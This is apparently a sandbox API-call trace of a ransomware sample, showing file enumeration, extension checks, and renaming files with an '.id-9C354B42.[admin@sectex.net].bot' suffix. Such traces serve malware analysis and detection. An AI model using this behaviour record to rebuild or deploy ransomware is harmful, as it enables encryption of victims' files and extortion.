	[0171.709] ReadFile (in: hFile=0x388, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0171.709] WriteFile (in: hFile=0x3c4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0171.709] SetEndOfFile (hFile=0x3c4) returned 1
	[0171.710] CloseHandle (hObject=0x3c4) returned 1
	[0171.710] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.710] SetEndOfFile (hFile=0x388) returned 1
	[0171.712] CloseHandle (hObject=0x388) returned 1
	[0171.712] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186346.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) 

Thread:
	id = 57
	os_tid = 0x770

	[0137.420] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10000) returned 0x9f90068
	[0137.420] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10000) returned 0x9fa0070
	[0137.421] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7baea58
	[0137.421] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x6) returned 0x7bac828
	[0137.421] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7baea70
	[0137.421] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x100000) returned 0xb070020
	[0137.421] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7baea88
	[0137.421] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7baea88, Size=0x20) returned 0x7b65ba8
	[0137.421] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7baea88
	[0137.421] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7baea88, Size=0x20) returned 0x7b65bd0
	[0137.421] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77080000
	[0137.422] GetProcAddress (hModule=0x77080000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x770ad650
	[0137.422] Wow64DisableWow64FsRedirection (in: OldValue=0xa54ff58 | out: OldValue=0xa54ff58*=0x0) returned 1
	[0137.422] lstrlenW (lpString="kernel32.dll") returned 12
	[0137.422] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b65ba8 | out: hHeap=0x7ab0000) returned 1
	[0137.422] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30
	[0137.422] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b65bd0 | out: hHeap=0x7ab0000) returned 1
	[0137.422] Sleep (dwMilliseconds=0x64) 
	[0137.596] Sleep (dwMilliseconds=0x64) 
	[0137.819] lstrcmpiW (lpString1=".xml", lpString2=".bot") returned 1
	[0137.819] lstrlenW (lpString="Alphabet.xml") returned 12
	[0137.819] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0
	[0137.889] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=791686) returned 1
	[0137.889] CloseHandle (hObject=0x2f0) returned 1
	[0137.889] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml")) returned 0x20
	[0137.889] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0137.889] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0137.889] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63
	[0137.889] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63
	[0137.889] lstrlenW (lpString=".doc") returned 4
	[0137.889] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0137.889] lstrlenW (lpString=".docx") returned 5
	[0137.890] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1
	[0137.890] lstrlenW (lpString=".pdf") returned 4
	[0137.890] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0137.890] lstrlenW (lpString=".xls") returned 4
	[0137.890] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0137.890] lstrlenW (lpString=".xlsx") returned 5
	[0137.890] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1
	[0137.890] lstrlenW (lpString=".ppt") returned 4
	[0137.890] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0137.890] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63
	[0137.890] lstrlenW (lpString=".zip") returned 4
	[0137.890] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0137.890] lstrlenW (lpString=".rar") returned 4
	[0137.890] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0137.890] lstrlenW (lpString=".bz2") returned 4
	[0137.890] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0137.890] lstrlenW (lpString=".7z") returned 3
	[0137.890] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0137.890] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63
	[0137.890] lstrlenW (lpString=".dbf") returned 4
	[0137.890] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0137.890] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63
	[0137.890] lstrlenW (lpString=".1cd") returned 4
	[0137.890] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0137.890] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63
	[0137.890] lstrlenW (lpString=".jpg") returned 4
	[0137.890] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0137.890] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63
	[0137.890] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63
	[0137.890] lstrlenW (lpString=".doc") returned 4
	[0137.890] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0137.890] lstrlenW (lpString=".docx") returned 5
	[0137.890] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1
	[0137.891] lstrlenW (lpString=".pdf") returned 4
	[0137.891] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0137.891] lstrlenW (lpString=".xls") returned 4
	[0137.891] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0137.891] lstrlenW (lpString=".xlsx") returned 5
	[0137.891] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1
	[0137.891] lstrlenW (lpString=".ppt") returned 4
	[0137.891] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0137.891] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63
	[0137.891] lstrlenW (lpString=".zip") returned 4
	[0137.891] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0137.891] lstrlenW (lpString=".rar") returned 4
	[0137.891] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0137.891] lstrlenW (lpString=".bz2") returned 4
	[0137.891] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0137.891] lstrlenW (lpString=".7z") returned 3
	[0137.891] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0137.891] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63
	[0137.891] lstrlenW (lpString=".dbf") returned 4
	[0137.891] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0137.891] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63
	[0137.891] lstrlenW (lpString=".1cd") returned 4
	[0137.891] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0137.891] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63
	[0137.891] lstrlenW (lpString=".jpg") returned 4
	[0137.891] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0137.891] lstrcmpiW (lpString1=".xml", lpString2=".bot") returned 1
	[0137.891] lstrlenW (lpString="Content.xml") returned 11
	[0137.891] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0
	[0137.892] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=27045) returned 1
	[0137.892] CloseHandle (hObject=0x2f0) returned 1
	[0137.892] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml")) returned 0x20
	[0137.892] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0137.892] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0137.892] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62
	[0137.892] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62
	[0137.892] lstrlenW (lpString=".doc") returned 4
	[0137.892] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0137.892] lstrlenW (lpString=".docx") returned 5
	[0137.892] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1
	[0137.892] lstrlenW (lpString=".pdf") returned 4
	[0137.892] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0137.892] lstrlenW (lpString=".xls") returned 4
	[0137.892] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0137.892] lstrlenW (lpString=".xlsx") returned 5
	[0137.892] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1
	[0137.892] lstrlenW (lpString=".ppt") returned 4
	[0137.893] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0137.893] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62
	[0137.893] lstrlenW (lpString=".zip") returned 4
	[0137.893] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0137.893] lstrlenW (lpString=".rar") returned 4
	[0137.893] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0137.893] lstrlenW (lpString=".bz2") returned 4
	[0137.893] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0137.893] lstrlenW (lpString=".7z") returned 3
	[0137.893] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0137.893] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62
	[0137.893] lstrlenW (lpString=".dbf") returned 4
	[0137.893] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0137.893] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62
	[0137.893] lstrlenW (lpString=".1cd") returned 4
	[0137.893] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0137.893] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62
	[0137.893] lstrlenW (lpString=".jpg") returned 4
	[0137.893] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0137.893] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62
	[0137.893] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62
	[0137.893] lstrlenW (lpString=".doc") returned 4
	[0137.893] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0137.893] lstrlenW (lpString=".docx") returned 5
	[0137.893] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1
	[0137.893] lstrlenW (lpString=".pdf") returned 4
	[0137.893] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0137.893] lstrlenW (lpString=".xls") returned 4
	[0137.893] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0137.893] lstrlenW (lpString=".xlsx") returned 5
	[0137.893] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1
	[0137.893] lstrlenW (lpString=".ppt") returned 4
	[0137.893] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0137.894] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62
	[0137.894] lstrlenW (lpString=".zip") returned 4
	[0137.894] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0137.894] lstrlenW (lpString=".rar") returned 4
	[0137.894] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0137.894] lstrlenW (lpString=".bz2") returned 4
	[0137.894] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0137.894] lstrlenW (lpString=".7z") returned 3
	[0137.894] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0137.894] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62
	[0137.894] lstrlenW (lpString=".dbf") returned 4
	[0137.894] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0137.894] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62
	[0137.894] lstrlenW (lpString=".1cd") returned 4
	[0137.894] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0137.894] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62
	[0137.894] lstrlenW (lpString=".jpg") returned 4
	[0137.894] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0137.894] lstrcmpiW (lpString1=".avi", lpString2=".bot") returned -1
	[0137.894] lstrlenW (lpString="boxed-correct.avi") returned 17
	[0137.894] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a4
	[0138.613] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=89600) returned 1
	[0138.613] CloseHandle (hObject=0x2a4) returned 1
	[0138.614] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi")) returned 0x20
	[0138.614] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0138.648] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0138.663] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74
	[0138.663] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74
	[0138.669] lstrlenW (lpString=".doc") returned 4
	[0138.669] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1
	[0138.673] lstrlenW (lpString=".docx") returned 5
	[0138.673] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1
	[0138.676] lstrlenW (lpString=".pdf") returned 4
	[0138.681] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1
	[0138.683] lstrlenW (lpString=".xls") returned 4
	[0138.683] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1
	[0138.684] lstrlenW (lpString=".xlsx") returned 5
	[0138.693] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1
	[0138.694] lstrlenW (lpString=".ppt") returned 4
	[0138.694] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1
	[0138.694] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74
	[0138.694] lstrlenW (lpString=".zip") returned 4
	[0138.694] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1
	[0138.694] lstrlenW (lpString=".rar") returned 4
	[0138.695] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1
	[0138.695] lstrlenW (lpString=".bz2") returned 4
	[0138.695] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1
	[0138.695] lstrlenW (lpString=".7z") returned 3
	[0138.695] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1
	[0138.695] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74
	[0138.695] lstrlenW (lpString=".dbf") returned 4
	[0138.695] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1
	[0138.695] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74
	[0138.695] lstrlenW (lpString=".1cd") returned 4
	[0138.695] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1
	[0138.695] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74
	[0138.695] lstrlenW (lpString=".jpg") returned 4
	[0138.695] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1
	[0138.695] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74
	[0138.695] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74
	[0138.695] lstrlenW (lpString=".doc") returned 4
	[0138.695] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1
	[0138.695] lstrlenW (lpString=".docx") returned 5
	[0138.695] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1
	[0138.695] lstrlenW (lpString=".pdf") returned 4
	[0138.695] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1
	[0138.695] lstrlenW (lpString=".xls") returned 4
	[0138.695] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1
	[0138.695] lstrlenW (lpString=".xlsx") returned 5
	[0138.695] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1
	[0138.695] lstrlenW (lpString=".ppt") returned 4
	[0138.695] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1
	[0138.695] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74
	[0138.695] lstrlenW (lpString=".zip") returned 4
	[0138.695] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1
	[0138.695] lstrlenW (lpString=".rar") returned 4
	[0138.695] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1
	[0138.696] lstrlenW (lpString=".bz2") returned 4
	[0138.696] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1
	[0138.696] lstrlenW (lpString=".7z") returned 3
	[0138.696] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1
	[0138.696] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74
	[0138.696] lstrlenW (lpString=".dbf") returned 4
	[0138.696] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1
	[0138.696] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74
	[0138.696] lstrlenW (lpString=".1cd") returned 4
	[0138.696] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1
	[0138.696] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74
	[0138.696] lstrlenW (lpString=".jpg") returned 4
	[0138.696] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1
	[0138.696] Sleep (dwMilliseconds=0x64) 
	[0138.894] lstrcmpiW (lpString1=".png", lpString2=".bot") returned 1
	[0138.894] lstrlenW (lpString="1047x576black.png") returned 17
	[0138.894] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\1047x576black.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390
	[0138.897] GetFileSizeEx (in: hFile=0x390, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=4570) returned 1
	[0138.897] CloseHandle (hObject=0x390) returned 1
	[0138.897] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\1047x576black.png")) returned 0x20
	[0138.897] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\1047x576black.png.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\1047x576black.png.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0138.897] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\1047x576black.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0138.897] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\1047x576black.png") returned 70
	[0138.897] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\1047x576black.png") returned 70
	[0138.897] lstrlenW (lpString=".doc") returned 4
	[0138.897] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1
	[0138.897] lstrlenW (lpString=".docx") returned 5
	[0138.897] lstrcmpiW (lpString1=".docx", lpString2="k.png") returned -1
	[0138.897] lstrlenW (lpString=".pdf") returned 4
	[0138.897] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1
	[0138.897] lstrlenW (lpString=".xls") returned 4
	[0138.897] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1
	[0138.897] lstrlenW (lpString=".xlsx") returned 5
	[0138.897] lstrcmpiW (lpString1=".xlsx", lpString2="k.png") returned -1
	[0138.898] lstrlenW (lpString=".ppt") returned 4
	[0138.898] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1
	[0138.898] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\1047x576black.png") returned 70
	[0138.898] lstrlenW (lpString=".zip") returned 4
	[0138.898] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1
	[0138.898] lstrlenW (lpString=".rar") returned 4
	[0138.898] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1
	[0138.898] lstrlenW (lpString=".bz2") returned 4
	[0138.898] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1
	[0138.898] lstrlenW (lpString=".7z") returned 3
	[0138.898] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1
	[0138.898] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\1047x576black.png") returned 70
	[0138.898] lstrlenW (lpString=".dbf") returned 4
	[0138.898] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1
	[0138.898] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\1047x576black.png") returned 70
	[0138.898] lstrlenW (lpString=".1cd") returned 4
	[0138.898] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1
	[0138.898] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\1047x576black.png") returned 70
	[0138.898] lstrlenW (lpString=".jpg") returned 4
	[0138.898] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1
	[0138.898] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\1047x576black.png") returned 70
	[0138.898] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\1047x576black.png") returned 70
	[0138.898] lstrlenW (lpString=".doc") returned 4
	[0138.898] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1
	[0138.898] lstrlenW (lpString=".docx") returned 5
	[0138.898] lstrcmpiW (lpString1=".docx", lpString2="k.png") returned -1
	[0138.898] lstrlenW (lpString=".pdf") returned 4
	[0138.898] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1
	[0138.898] lstrlenW (lpString=".xls") returned 4
	[0138.898] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1
	[0138.898] lstrlenW (lpString=".xlsx") returned 5
	[0138.898] lstrcmpiW (lpString1=".xlsx", lpString2="k.png") returned -1
	[0138.898] lstrlenW (lpString=".ppt") returned 4
	[0138.899] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1
	[0138.899] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\1047x576black.png") returned 70
	[0138.899] lstrlenW (lpString=".zip") returned 4
	[0138.899] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1
	[0138.899] lstrlenW (lpString=".rar") returned 4
	[0138.899] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1
	[0138.899] lstrlenW (lpString=".bz2") returned 4
	[0138.899] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1
	[0138.899] lstrlenW (lpString=".7z") returned 3
	[0138.899] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1
	[0138.899] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\1047x576black.png") returned 70
	[0138.899] lstrlenW (lpString=".dbf") returned 4
	[0138.899] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1
	[0138.899] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\1047x576black.png") returned 70
	[0138.899] lstrlenW (lpString=".1cd") returned 4
	[0138.899] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1
